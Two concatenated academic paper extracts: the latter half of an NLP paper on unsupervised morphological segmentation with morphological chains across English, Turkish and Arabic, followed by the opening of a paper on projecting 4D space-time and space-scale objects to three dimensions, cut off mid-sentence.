(-, Stop) begin=pa 1 end=er 1 0.5 < MaxCos < 0.6 1 length=7 1 Table 2: Example of various types of features used in the model. ~w and ~p are the word vectors for the word and parent, respectively. Transformations We also support transforma- tions to enable non-concatenative morphology. Even in English, which is mostly concatenative, such transformations are frequent. We consider three kinds of transformations previously considered in the literature (Goldwater and Johnson, 2004): • repetition of the last character in the parent (ex. plan → planning ) • deletion of the last character in the parent (ex. decide → deciding ) • modification of the last character of the parent (ex. carry → carried ) We add features that are the cartesian prod- uct of the type of transformation and the charac- ter(s) involved. For instance, for the parent-child pair (believe, believing ), the feature type=Delete × chars=(e,-) will be activated, while the rest of the transformational features will be 0. Stop Condition Finally, we introduce features that aim to identify base words which do not have a parent. The features include the length of the word, and the starting and ending character uni- grams and bigrams. In addition, we include a feature that records the highest cosine similarity between the word and any of its candidate parents. This fea- ture will help, for example, to identify paint as a base word, instead of choosing pain as its parent. 3.3 Learning We learn the log-linear model in an unsupervised manner without explicit feedback about correct mor- phological segmentations. We assume that we have an unannotated wordlist D for this purpose. A typ- ical approach to learning such a model would be to maximize the likelihood of all the observed words in D over the space of all strings constructible in the alphabet, Σ∗, by marginalizing over the hidden candidates.7 In other words, we could use the EM- algorithm to maximize L(θ; D) = ∏ w∗∈D P(w∗) = ∏ w∗∈D ∑ z∈C(w∗) P(w∗,z) = ∏ w∗∈D [ ∑ z∈C(w∗) e θ·φ(w∗,z) ∑ w∈Σ∗ ∑ z∈C(w) e θ·φ(w,z) ] (1) However, maximizing L(θ; D) is problematic since approximate methods would be needed to sum over Σ∗ in order to calculate the normalization term in (1). Moreover, we would like to encourage the model to emphasize relevant parent-child pairs8 out of a smaller set of alternatives rather than those per- taining to all the words. 7We also tried maximizing instead of marginalizing, but the model gets stuck in one of the numerous local optima. 8In other words, assign higher probability mass. 161 We employ Contrastive Estimation (Smith and Eisner, 2005) and replace the normalization term by a sum over the neighbors of each word. For each word in the language, we create neighboring strings in two sets. For the first set, we transpose a single pair of adjacent characters of the word. We perform this transposition over the first k or the last k charac- ters of the word.9 For the second set, we transpose two pairs of characters simultaneously – one from the first k characters and one from the last k. The combined set of artificially constructed words represents the events that we wish to move probabil- ity mass away from in favor of the actually observed words. The neighbors facilitate the learning of good weights for the affix features by providing the re- quired contrast (at both ends of the words) to the actual words in the vocabulary. A remaining con- cern is that the model may not distinguish any arbi- trary substring from a good suffix/prefix. For exam- ple, -ng appears in all the words that end with -ing, and could be considered a valid suffix. We include other features to help make this distinction. Specifi- cally, we include features such as word vector simi- larity and the presence of the parent in the observed wordlist. For example, in the word painting, the par- ent candidate paint is likely to occur and also has a high cosine similarity with painting in terms of their word vectors. In contrast, painti does not. Given the list of words and their neighborhoods, we define the contrastive likelihood as follows: (2) LCE(θ,D) = ∏ w∗∈D [ ∑ z∈C(w∗) e θ·φ(w∗,z) ∑ w∈N(w∗) ∑ z∈C(w) e θ·φ(w,z) ] where N(w∗) is the neighborhood of w∗. This like- lihood is much easier to evaluate and optimize. After adding in a standard regularization term, we maximize the following log likelihood objective: (3) ∑ w∗ ∈D  log ∑ z∈C(w∗) eθ·φ(w ∗,z) − log ∑ w∈N(w∗) ∑ z∈C(w) eθ·φ(w,z)  −λ||θ||2 9The performance increases with increasing k until k = 5, after which no gains were observed. The corresponding gradient can be derived as: ∂LCE(θ; D) ∂θj = ∑ w∗∈D [∑ z∈C(w∗) φj(w ∗,z) ·eθ·φ(w∗,z) ∑ z∈C(w∗) e θ·φ(w∗,z) − ∑ w∈N(w∗) ∑ z∈C(w) φj(w,z) ·eθ·φ(w,z)∑ w∈N(w∗) ∑ z∈C(w) e θ·φ(w,z) ] − 2λθj (4) We use LBFGS-B (Byrd et al., 1995) to optimize LCE(θ; D) with gradients given above. 3.4 Prediction Given a test word, we predict a morphological chain in a greedy step by step fashion. In each step, we use the learnt weights to predict the best parent for the current word (from the set of candidates), or choose to stop and declare the current word as a base word if the stop case has the highest score. Once we have the chain, we can derive a morphological segmentation by inserting a segmentation point (into the test word) appropriately for each edge in the chain. Algorithms 1 and 2 provide details on the predic- tion procedure. In both algorithms, type refers to the type of modification (or lack of) that the parent undergoes: Prefix/Suffix addition, types of transfor- mation like repetition, deletion, modification, or the Stop case. Algorithm 1 Procedure to predict a parent for a word 1: procedure PREDICT(word) 2: candidates ← CANDIDATES(word) 3: bestScore ← 0 4: bestCand ← (−,STOP) 5: for cand ∈ candidates do 6: features ← FEATURES(word,cand) 7: score ← MODELSCORE(features) 8: if score > bestScore then 9: bestScore ← score 10: bestCand ← cand 11: return bestCand 162 Algorithm 2 Procedure to predict a morphological chain 1: procedure GETCHAIN(word) 2: candidate ← PREDICT(word) 3: parent,type ← candidate 4: if type = STOP then return [(word, STOP)] 5: return GETCHAIN(parent)+[(parent,type)] Lang Train Test WordVec (# words) (# words) (# words) English MC-10 MC-05:10 Wikipedia (878K) (2218) (129M) Turkish MC-10 MC-05:10 BOUN (617K) (2534) (361M) Arabic Gigaword ATB Gigaword (3.83M) (119K) (1.22G) Table 4: Data corpora and statistics. MC-10 = Mor- phoChallenge 201010, MC-05:10 = MorphoChal- lenges 2005-10 (aggregated), BOUN = BOUN cor- pus (Sak et al., 2008), Gigaword = Arabic Gigaword corpus (Parker et al., 2011), ATB = Arabic Tree- bank (Maamouri et al., 2003) 4 Experimental Setup Data We run experiments on three different lan- guages: English, Turkish and Arabic. For each lan- guage, we utilize corpora for training, testing and learning word vectors. The training data consists of an unannotated wordlist with frequency information, while the test data is a set of gold morphological segmentations. For the word vectors, we train the word2vec tool (Mikolov et al., 2013) on large text corpora and obtain 200-dimensional vectors for all three languages. Table 4 provides information about each dataset. Evaluation measure We test our model on the task of morphological segmentation. We evalu- ate performance on individual segmentation points, which is standard for this task (Virpioja et al., 2011). We compare predicted segmentations against the gold test data for each language and report overall Precision, Recall and F-1 scores calculated across 10http://research.ics.aalto.fi/events/morphochallenge/ all segmentation points in the data. As is common in unsupervised segmentation (Poon et al., 2009; Sirts and Goldwater, 2013), we included the test words (without their segmentations) with the train- ing words during parameter learning. Baselines We compare our model with five other systems: Morfessor Baseline (Morf-Base), Morfes- sor CatMap (Morf-Cat), AGMorph, the Lee Seg- menter and the system of Poon et al. (2009). Mor- fessor has achieved excellent performance on the MorphoChallenge dataset, and is widely used for performing unsupervised morphological analysis on various languages, even in fairly recent work (Lu- ong et al., 2013). In our experiments, we employ two variants of the system because their relative per- formance varies across languages. We use publicly available implementations of these variants (Virpi- oja et al., 2013; Creutz and Lagus, 2005). We perform several runs with various parameters, and choose the run with the best performance on each language. We evaluate AGMorph by directly obtaining the posterior grammars from the authors.11 We show results for the Compounding grammar, which we find has the best average performance over the lan- guages. The Lee Segmenter (Lee et al., 2011), im- proved upon by using Maximum Marginal decoding in Stallard et al. (2012), has achieved excellent per- formance on the Arabic (ATB) dataset. We perform comparison experiments with the model 2 (M2) of the segmenter, which employs latent POS tags, and does not require sentence context which is not avail- able for other languages in the dataset. We obtained the code for the system, and run it on our English and Turkish datasets.12 We do not have access to an implementation of Poon et al’s system; hence, we directly report scores from their paper on the ATB dataset and test our model on the same data. 5 Results Table 5 details the performance of the various mod- els on the segmentation task. We can see that our method outperforms both variants of Morfessor, 11The grammars were trained using data we provided to them. 12We report numbers on Arabic directly from their paper. 163 Figure 1: Model performance vs data size obtained by frequency thresholding with an absolute gain of 8.5%, 5.1% and 5% in F- score on English, Turkish and Arabic, respectively. On Arabic, we obtain a 2.2% absolute improvement over Poon et al.’s model. AGMorph doesn’t seg- ment better than Morfessor on English and Arabic but does very well on Turkish (60.9% F1 compared to our model’s 61.2%). This could be due to the fact that the Compounding grammar is well suited to the agglutinative morphology in Turkish and hence pro- vides more gains than for English and Arabic. The Lee Segmenter (M2) performs the best on Arabic (82% F1), but lags behind on English and Turkish. This result is consistent with the fact that the system was optimized for Arabic. The table also demonstrates the importance of the added semantic information in our model. For all three languages, having the features that utilize co- sine similarity provides a significant boost in perfor- mance. We also see that the transformation features and affix correlation features play a role in improv- ing the results, although a less important one. Next, we study the effect of data quality on the prediction of the algorithm. A training set often contains misspellings, abbreviations and truncated words. Thresholding based on frequency is com- monly used to reduce this noise. Figure 1 shows the performance of the algorithm as a function of the data size obtained at various degrees of threshold- ing. We note that the performance of the model on all three languages remains quite stable from about Lang Method Prec Recall F-1 English Morf-Base 0.740 0.623 0.677 Morf-Cat 0.673 0.587 0.627 AGMorph 0.696 0.604 0.647 Lee (M2) 0.825 0.525 0.642 Model -C 0.555 0.792 0.653 Model -T 0.831 0.664 0.738 Model -A 0.810 0.713 0.758 Full model 0.807 0.722 0.762 Turkish Morf-Base 0.827 0.362 0.504 Morf-Cat 0.522 0.607 0.561 AGMorph 0.878 0.466 0.609 Lee (M2) 0.787 0.355 0.489 Model -C 0.516 0.652 0.576 Model -T 0.665 0.521 0.584 Model -A 0.668 0.543 0.599 Full model 0.743 0.520 0.612 Arabic Morf-Base 0.807 0.204 0.326 Morf-Cat 0.774 0.726 0.749 AGMorph 0.672 0.761 0.713 Poon et al. 0.885 0.692 0.777 Lee (M2) - - 0.820 Model -C 0.626 0.912 0.743 Model -T 0.774 0.807 0.790 Model -A 0.775 0.808 0.791 Full model 0.770 0.831 0.799 Table 5: Results on unsupervised morphological segmentation; scores are calculated across all seg- mentation points in the test data. Baselines are in italics. -C=without cosine features, -T=without transformation features, -A=without affix correla- tion features. Numbers on Arabic for Poon et al. and Lee (M2) are reported directly from their papers. 1000 to 10000 training words, after which the devia- tions are more apparent. The plot also demonstrates that the model works well even with a small amount of quality data (≈3000 most frequent words). Error analysis We look at a random subset of 50 incorrectly segmented words13 in the model’s output for each language. Table 7 gives a breakup of errors in all 3 languages due to over or under-segmentation. Table 6 provides examples of correct and incorrect segmentations predicted by our model. 13Words with at least one segmentation point incorrect 164 Language Correct Segmentations Incorrect Segmentations Word Segmentation Word Predicted Correct English salvoes salvo-es contempt con-tempt contempt negotiations negotiat-ion-s sterilizing steriliz-ing steril-iz-ing telephotograph tele-photo-graph desolating desolating desolat-ing unequivocally un-equivocal-ly storerooms storeroom-s store-room-s carsickness’s car-sick-ness-’s tattlers tattler-s tattl-er-s Turkish moderni modern-i mektuplaşmalar mektuplaşma-lar mektup-laş-ma-lar teknolojideki teknoloji-de-ki gelecektiniz gelecek-tiniz gel-ecek-ti-niz burasıydı bura-sı-ydı aynalardan ayna-lar-da-n ayna-lar-dan çizgisine çiz-gi-si-ne uyuduğunuzu uyudu-ğu-nuzu uyu-duğ-unuz-u değişiklikte değişik-lik-te dirseğe dirseğe dirseğ-e Arabic sy$Ark s-y-$Ark wryfAldw w-ry-fAldw w-ryfAldw nyqwsyA nyqwsyA bHlwlhA b-Hlwl-h-A b-Hlwl-hA AlmTrwHp Al-mTrwH-p jnwby jnwb-y jnwby ytEAmlwA y-tEAml-wA wbAyrn w-bAyr-n w-bAyrn lAtnZr lA-t-nZr rknyp rknyp rkny-p Table 6: Examples of correct and incorrect segmentations produced by our model on the three languages. Correct segmentations are taken directly from gold MorphoChallenge data. Lang Over-segment Under-segment English 10% 86% Turkish 12% 78 % Arabic 60% 40% Table 7: Types of errors in analysis of 50 randomly sampled incorrect segmentations for each language. The remaining errors are due to incorrect placement of segmentation points. In English, most errors are due to under- segmentation of a word. We find that around 60% of errors are due to roots that undergo transformations while morphing into a variant (see table 6 for exam- ples). Errors in Turkish are also mostly due to under- segmentation. On further investigation, we find that most such errors (58% of the 78%) are due to parent words either not in vocabulary or having a very low word count (≤ 10). In contrast, we observe a ma- jority of over-segmentation errors in Arabic (60%). This is likely because of Arabic having more sin- gle character affixes than the other languages. We find that 56% of errors in Arabic involve a single- character affix, which is much higher than the 24.6% that involve a two-letter affix. In contrast, 25% of er- rors in English are due to single character affixes – around the same number as the 24% of errors due to two-letter affixes. Since our model is an unsupervised one, we make several simplifying assumptions to keep the candi- date set size manageable for learning. For instance, we do not explicitly model infixes, since we select parent candidates by only modifying the ends of a word. Also, the root-template morphology of Ara- bic, a Semitic language, presents a complexity we do not directly handle. For instance, words in Ara- bic can be formed using specific patterns (known as binyanim) (ex. nZr → yntZr ). However, on going through the errors, we find that only 14% are due to these binyanim patterns not being cap- tured.14 Adding in transformation rules to capture these types of language-specific patterns can help in- crease both chain and segmentation accuracy. Analysis of learned distributions To investigate how decisive the learnt model is, we examine the final probability distribution P(z|w) of parent can- didates for the words in the English wordlist. We observe that the probability of the best candidate (maxzP(z|w)), averaged over all words, is 0.77. We also find that the average entropy of the distri- 14This might be due to the fact that the gold segmentations also do not capture such patterns. For example, the gold seg- mentation for yntZrwn is given as y-ntZr-wn, even though ntZr is not a valid root. 165 Figure 2: Comparison of gold and predicted fre- quency distributions of the top 15 affixes for English butions is 0.65, which is quite low considering that the average number of candidates is 10.76 per word, which would result in a max possible entropy of around 2.37 if the distributions were uniform. This demonstrates that the model tends to prefer a single parent for every word,15 which is exactly the behav- ior we want. Affix analysis We also analyze the various affixes produced by the model, and compare with the gold affixes. Particularly, we plot the frequency distri- butions of the affixes16 obtained from the gold and 15Note that the candidate probability distribution may have more than a single peak in some cases. 16To conserve space, we only show the distribution of suf- fixes here, but we observe a similar trend for prefixes. predicted segmentations for the English test data in figure 2. From the figure, we can see that our model learns to identify good affixes for the given language. Sev- eral of the top affixes predicted are also present in the gold list, and we also observe similarities in the frequency distributions. 6 Conclusion In this work, we have proposed a discriminative model for unsupervised morphological segmenta- tion that seamlessly integrates orthographic and se- mantic properties of words. We use morpholog- ical chains to model the word formation process and show how to employ the flexibility of log-linear models to incorporate both morpheme and word- level features, while handling transformations of parent words. Our model consistently equals or out- performs five state-of-the-art systems on Arabic, En- glish and Turkish. Future directions of work in- clude using better neighborhood functions for con- trastive estimation, exploring other views of the data that could be incorporated, examining better predic- tion schemes and employing morphological chains in other applications in NLP. Acknowledgements We thank Kairit Sirts and Yoong Keok Lee for helping run experiments with their unsupervised morphological analyzers, and Yonatan Belinkov for helping with error analysis in Arabic. We also thank the anonymous TACL reviewers and mem- bers of MIT’s NLP group for their insightful com- ments and suggestions. This work was supported by the Intelligence Advanced Research Projects Activ- ity (IARPA) via Department of Defense US Army Research Laboratory contract number W911NF-12- C-0013. The U.S. Government is authorized to reproduce and distribute reprints for Governmen- tal purposes notwithstanding any copyright annota- tion thereon. The views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or im- plied, of IARPA, DoD/ARL, or the U.S. Govern- ment. 166 References R Baayen, R Piepenbrock, and L Gulikers. 1995. CELEX2 LDC96L14. Philadelphia: Linguistic Data Consortium. Marco Baroni, Johannes Matiasek, and Harald Trost. 2002. Unsupervised discovery of morphologically re- lated words based on orthographic and semantic simi- larity. CoRR, cs.CL/0205006. Richard H Byrd, Peihuang Lu, Jorge Nocedal, and Ciyou Zhu. 1995. A limited memory algorithm for bound constrained optimization. SIAM Journal on Scientific Computing, 16(5):1190–1208. Mathias Creutz and Krista Lagus. 2005. Inducing the morphological lexicon of a natural language from unannotated text. In Proceedings of the International and Interdisciplinary Conference on Adaptive Knowl- edge Representation and Reasoning (AKRR), pages 106–113. Mathias Creutz and Krista Lagus. 2007. Unsuper- vised models for morpheme segmentation and mor- phology learning. ACM Trans. Speech Lang. Process., 4(1):3:1–3:34, February. Markus Dreyer and Jason Eisner. 2011. Discover- ing morphological paradigms from plain text using a dirichlet process mixture model. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 616–627. Association for Computational Linguistics. Sharon Goldwater and Mark Johnson. 2004. Priors in bayesian learning of phonological rules. In Proceed- ings of the 7th Meeting of the ACL Special Interest Group in Computational Phonology: Current Themes in Computational Phonology and Morphology, SIG- MorPhon ’04, pages 35–42, Stroudsburg, PA, USA. Association for Computational Linguistics. Yoong Keok Lee, Aria Haghighi, and Regina Barzi- lay. 2011. Modeling syntactic context improves morphological segmentation. In Proceedings of the Fifteenth Conference on Computational Natural Lan- guage Learning, CoNLL ’11, pages 1–9, Stroudsburg, PA, USA. Association for Computational Linguistics. Minh-Thang Luong, Richard Socher, and Christopher D. Manning. 2013. Better word representations with re- cursive neural networks for morphology. In CoNLL, Sofia, Bulgaria. Mohamed Maamouri, Ann Bies, Hubert Jin, and Tim Buckwalter. 2003. Arabic Treebank: Part 1 v 2.0 LDC2003T06. Philadelphia: Linguistic Data Consor- tium. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Distributed representations of words and phrases and their compositionality. CoRR, abs/1310.4546. Robert Parker, David Graff, Ke Chen, Junbo Kong, and Kazuaki Maeda. 2011. Arabic Gigaword fifth edition LDC2011T11. Philadelphia: Linguistic Data Consor- tium. Hoifung Poon, Colin Cherry, and Kristina Toutanova. 2009. Unsupervised morphological segmentation with log-linear models. In Proceedings of Human Lan- guage Technologies: The 2009 Annual Conference of the North American Chapter of the Association for Computational Linguistics, NAACL ’09, pages 209– 217, Stroudsburg, PA, USA. Association for Compu- tational Linguistics. Haşim Sak, Tunga Güngör, and Murat Saraçlar. 2008. Turkish language resources: Morphological parser, morphological disambiguator and web corpus. In Ad- vances in natural language processing, pages 417– 427. Springer. Patrick Schone and Daniel Jurafsky. 2000. Knowledge- free induction of morphology using latent semantic analysis. In Proceedings of the 2nd Workshop on Learning Language in Logic and the 4th Conference on Computational Natural Language Learning - Vol- ume 7, ConLL ’00, pages 67–72, Stroudsburg, PA, USA. Association for Computational Linguistics. Kairit Sirts and Sharon Goldwater. 2013. Minimally- supervised morphological segmentation using adaptor grammars. TACL, 1:255–266. Noah A. Smith and Jason Eisner. 2005. Contrastive estimation: Training log-linear models on unlabeled data. In Proceedings of the 43rd Annual Meeting on Association for Computational Linguistics, ACL ’05, pages 354–362, Stroudsburg, PA, USA. Association for Computational Linguistics. Benjamin Snyder and Regina Barzilay. 2008. Unsuper- vised multilingual learning for morphological segmen- tation. In The Annual Conference of the Association for Computational Linguistics. David Stallard, Jacob Devlin, Michael Kayser, Yoong Keok Lee, and Regina Barzilay. 2012. Unsupervised morphology rivals supervised mor- phology for arabic mt. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics: Short Papers-Volume 2, pages 322–327. Association for Computational Linguistics. Sami Virpioja, Ville T. Turunen, Sebastian Spiegler, Os- kar Kohonen, and Mikko Kurimo. 2011. Empirical comparison of evaluation methods for unsupervised learning of morphology. TAL, 52(2):45–90. Sami Virpioja, Peter Smit, Stig-Arne Grönroos, and Mikko Kurimo. 2013. Morfessor 2.0: Python imple- mentation and extensions for Morfessor Baseline. Re- port in Aalto University publication series SCIENCE + TECHNOLOGY, Department of Signal Processing and Acoustics, Aalto University, Helsinki, Finland. 167 168 work_ymogj4wlmff5xp3rhpie6woylq ---- Submitted 2 March 2017 Accepted 8 June 2017 Published 3 July 2017 Corresponding author Ken Arroyo Ohori, g.a.k.arroyoohori@tudelft.nl Academic editor Sándor Szénási Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.123 Copyright 2017 Arroyo Ohori et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Visualising higher-dimensional space- time and space-scale objects as projections to R3 Ken Arroyo Ohori, Hugo Ledoux and Jantien Stoter 3D Geoinformation, Delft University of Technology, Delft, Netherlands ABSTRACT Objects of more than three dimensions can be used to model geographic phenomena that occur in space, time and scale. For instance, a single 4D object can be used to represent the changes in a 3D object’s shape across time or all its optimal representations at various levels of detail. In this paper, we look at how such higher-dimensional space- time and space-scale objects can be visualised as projections from R4 to R3. We present three projections that we believe are particularly intuitive for this purpose: (i) a simple ‘long axis’ projection that puts 3D objects side by side; (ii) the well-known orthographic and perspective projections; and (iii) a projection to a 3-sphere (S3) followed by a stereographic projection to R3, which results in an inwards-outwards fourth axis. Our focus is in using these projections from R4 to R3, but they are formulated from Rn to Rn−1 so as to be easily extensible and to incorporate other non-spatial characteristics. We present a prototype interactive visualiser that applies these projections from 4D to 3D in real-time using the programmable pipeline and compute shaders of the Metal graphics API. Subjects Graphics, Scientific Computing and Simulation, Spatial and Geographic Information Systems Keywords Projections, Space-time, Space-scale, 4D visualisation, Nd gis BACKGROUND Projecting the 3D nature of the world down to two dimensions is one of the most common problems at the juncture of geographic information and computer graphics, whether as the map projections in both paper and digital maps (Snyder, 1987; Grafarend & You, 2014) or as part of an interactive visualisation of a 3D city model on a computer screen (Foley & Nielson, 1992; Shreiner et al., 2013). However, geographic information is not inherently limited to objects of three dimensions. Non-spatial characteristics such as time (Hägerstrand, 1970; Güting et al., 2000; Hornsby & Egenhofer, 2002; Kraak, 2003) and scale (Meijers, 2011a) are often conceived and modelled as additional dimensions, and objects of three or more dimensions can be used to model objects in 2D or 3D space that also have changing geometries along these non-spatial characteristics (Van Oosterom & Stoter, 2010; Arroyo Ohori, 2016). For example, a single 4D object can be used to represent the changes in a 3D object’s shape across time (Arroyo Ohori, Ledoux & Stoter, 2017) or How to cite this article Arroyo Ohori et al. (2017), Visualising higher-dimensional space-time and space-scale objects as projections to R3. PeerJ Comput. Sci. 3:e123; DOI 10.7717/peerj-cs.123 https://peerj.com mailto:g.a.k.arroyoohori@tudelft.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.123 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.123 (A) (B) (C) (D) Figure 1 A 4D model of a house at two levels of detail and all the equivalences its composing elements is a polychoron bounded by: (A) volumes representing the house at the two levels of detail, (B) a pyra- midal volume representing the window at the higher LOD collapsing to a vertex at the lower LOD, (C) a pyramidal volume representing the door at the higher LOD collapsing to a vertex at the lower LOD, and a roof volume bounded by (A) the roof faces of the two LODs, (B) the ridges at the lower LOD col- lapsing to the tip at the higher LOD and (C) the hips at the higher LOD collapsing to the vertex below them at the lower LOD. (D) A 3D cross-section of the model obtained at the middle point along the LOD axis. all the best representations of a 3D object at various levels of detail (Luebke et al., 2003; Van Oosterom & Meijers, 2014; Arroyo Ohori et al., 2015a; Arroyo Ohori, Ledoux & Stoter, 2015c). Objects of more than three dimensions can be however unintuitive (Noll, 1967; Frank, 2014), and visualising them is a challenge. While some operations on a higher-dimensional object can be achieved by running automated methods (e.g. certain validation tests or area/volume computations) or by visualising only a chosen 2D or 3D subset (e.g. some of its bounding faces or a cross-section), sometimes there is no substitute for being able to view a complete nD object—much like viewing floor or façade plans is often no substitute for interactively viewing the complete 3D model of a building. By viewing a complete model, one can see at once the 3D objects embedded in the model at every point in time or scale as well as the equivalences and topological relationships between their constituting elements. More directly, it also makes it possible to get an intuitive understanding of the complexity of a given 4D model. For instance, in Fig. 1 we show an example of a 4D model representing a house at two different levels of detail and all the equivalences its composing elements. It forms a valid manifold 4-cell (Arroyo Ohori, Damiand & Ledoux, 2014), allowing it to be represented using data structures such as a 4D generalised or combinatorial map. This paper thus looks at a key aspect that allows higher-dimensional objects to be visualised interactively, namely how to project higher-dimensional objects down to fewer dimensions. Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 2/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 While there is previous research on the visualisation of higher-dimensional objects, we aim to do so in a manner that is reasonably intuitive, implementable and fast. We therefore discuss some relevant practical concerns, such as how to also display edges and vertices and how to use compute shaders to achieve good framerates in practice. In order to do this, we first briefly review the most well-known transformations (translation, rotation and scale) and the cross-product in nD, which we use as fundamental operations in order to project objects and to move around the viewer in an nD scene. Afterwards, we show how to apply three different projections from Rn to Rn−1 and argue why we believe they are intuitive enough for real-world use. These can be used to project objects from R4 to R3, and if necessary, they can be used iteratively in order to bring objects of any dimension down to 3D or 2D. We thus present: (i) a simple ‘long axis’ projection that stretches objects along one custom axis while preserving all other coordinates, resulting in 3D objects that are presented side by side; (ii) the orthographic and perspective projections, which are analogous to those used from 3D to 2D; and (iii) an inwards/outwards projection to an (n−1)-sphere followed by an stereographic projection to Rn−1, which results in a new inwards-outwards axis. We present a prototype that applies these projections from 4D to 3D and then applies a standard perspective projection down to 2D. We also show that with the help of low-level graphics APIs, all the required operations can be applied at interactive framerates for the 4D to 3D case. We finish with a discussion of the advantages and disadvantages of this approach. Higher-dimensional modelling of space, time and scale There are a great number of models of geographic information, but most consider space, time and scale separately. For instance, space can be modelled using primitive instancing (Foley et al., 1995; Kada, 2007), constructive solid geometry (Requicha & Voelcker, 1977) or various boundary representation approaches (Muller & Preparata, 1978; Guibas & Stolfi, 1985; Lienhardt, 1994), among others. Time can be modelled on the basis of snapshots (Armstrong, 1988; Hamre, Mughal & Jacob, 1997), space–time composites (Peucker & Chrisman, 1975; Chrisman, 1983), events (Worboys, 1992; Peuquet, 1994; Peuquet & Duan, 1995), or a combination of all of these (Abiteboul & Hull, 1987; Worboys, Hearnshaw & Maguire, 1990; Worboys, 1994; Wachowicz & Healy, 1994). Scale is usually modelled based on independent datasets at each scale (Buttenfield & DeLotto, 1989; Friis-Christensen & Jensen, 2003; Meijers, 2011b), although approaches to combine them into single datasets (Gröger et al., 2012) or to create progressive and continuous representations also exist (Ballard, 1981; Jones & Abraham, 1986; Günther, 1988; Van Oosterom, 1990; Filho et al., 1995; Rigaux & Scholl, 1995; Plümer & Gröger, 1997; Van Oosterom, 2005). As an alternative to the all these methods, it is possible to represent any number of parametrisable characteristics (e.g. two or three spatial dimensions, time and scale) as additional dimensions in a geometric sense, modelling them as orthogonal axes such that real-world 0D–3D entities are modelled as higher-dimensional objects embedded in higher- dimensional space. These objects can be consequently stored using higher-dimensional Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 3/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 1A coordinate system based on projective geometry and typically used in computer graphics. An additional coordinate indicates a scale factor that is applied to all other coordinates. data structures and representation schemes Čomić & de Floriani (2012); Arroyo Ohori, Ledoux & Stoter (2015b). Possible approaches include incidence graphs (Rossignac & O’Connor, 1989; Masuda, 1993; Sohanpanah, 1989; Hansen & Christensen, 1993), Nef polyhedra Bieri & Nef (1988), and ordered topological models Brisson (1993); Lienhardt (1994). This is consistent with the basic tenets of n-dimensional geometry (Descartes, 1637; Riemann, 1868) and topology (Poincaré, 1895), which means that it is possible to apply a wide variety of computational geometry and topology methods to these objects. In a practical sense, 4D topological relationships between 4D objects provide insights that 3D topological relationships cannot (Arroyo Ohori, Boguslawski & Ledoux, 2013). Also, McKenzie, Williamson & Hazelton (2001) contends that weather and groundwater phenomena cannot be adequately studied in less than four dimensions, and Van Oosterom & Stoter (2010) argue that the integration of space, time and scale into a 5D model for GIS can be used to ease data maintenance and improve consistency, as algorithms could detect if the 5D representation of an object is self-consistent and does not conflict with other objects. Basic transformations and the cross-product in nD The basic transformations (translation, scale and rotation) have a straightforward definition in n dimensions, which can be used to move and zoom around a scene composed of nD objects. In addition, the n-dimensional cross-product can be used to obtain a new vector that is orthogonal to a set of other n−1 vectors in Rn. We use these operations as a base for nD visualisation and are thus described briefly below. The translation of a set of points in Rn can be easily expressed as a sum with a vector t = [t0,...,tn], or alternatively as a multiplication with a matrix using homogeneous coordinates1 in an (n+1)×(n+1) matrix, which is defined as: T =   1 0 ··· 0 t0 0 1 ··· 0 t1 ... ... ... ... ... 0 0 ··· 1 tn 0 0 ··· 0 1  . Scaling is similarly simple. Given a vector s= [s0,s1,...,sn] that defines a scale factor per axis (which in the simplest case can be the same for all axes), it is possible to define a matrix to scale an object as: S=   s0 0 ··· 0 0 s1 ··· 0 ... ... ... ... 0 0 ··· sn  . Rotation is somewhat more complex. Rotations in 3D are often conceptualised intuitively as rotations around the x, y and z axes. However, this view of the matter is only valid in 3D. In higher dimensions, it is necessary to consider instead rotations parallel to a given plane (Hollasch, 1991), such that a point that is continuously rotated (without Arroyo Ohori et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.123 4/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.123 changing the rotation direction) will form a circle that is parallel to that plane. This view is valid in 2D (where there is only one such plane), in 3D (where a plane is orthogonal to the usually defined axis of rotation) and in any higher dimension. Incidentally, this shows that the degree of rotational freedom in nD is given by the number of possible combinations of two axes (which define a plane) on that dimension (Hanson, 1994), i.e. ( n 2 ) . Thus, in a 4D coordinate system defined by the axes x, y, z and w, it is possible to define six 4D rotation matrices, which correspond to the six rotational degrees of freedom in 4D (Hanson, 1994). These respectively rotate points in R4 parallel to the xy, xz, xw, yz, yw and zw planes: Rxy =   cos θ −sin θ 0 0 sin θ cos θ 0 0 0 0 1 0 0 0 0 1   Rxz =   cos θ 0 −sin θ 0 0 1 0 0 sin θ 0 cos θ 0 0 0 0 1   Rxw =   cos θ 0 0 −sin θ 0 1 0 0 0 0 1 0 sin θ 0 0 cos θ   Ryz =   1 0 0 0 0 cos θ −sin θ 0 0 sin θ cos θ 0 0 0 0 1   Ryw =   1 0 0 0 0 cos θ 0 −sin θ 0 0 1 0 0 sin θ 0 cos θ   Rzw =   1 0 0 0 0 1 0 0 0 0 cos θ −sin θ 0 0 sin θ cos θ  . The n-dimensional cross-product is easy to understand by first considering the lower- dimensional cases. In 2D, it is possible to obtain a normal vector to a 1D line as defined by two (different) points p0 and p1, or equivalently a normal vector to a vector from p0 to p1. In 3D, it is possible to obtain a normal vector to a 2D plane as defined by three (non-collinear) points p0, p1 and p2, or equivalently a normal vector to a pair of vectors from p0 to p1 and from p0 to p2. Similarly, in nD it is possible to obtain a normal vector to a (n−1)D subspace—probably easier to picture as an (n−1)-simplex—as defined by n linearly independent points p0,p1,...,pn−1, or equivalently a normal vector to a set of n−1 vectors from p0 to every other point (i.e., p1,p2,...,pn−1) (Massey, 1983; Elduque, 2004). Hanson (1994) follows the latter explanation using a set of n−1 vectors all starting from the first point to give an intuitive definition of the n-dimensional 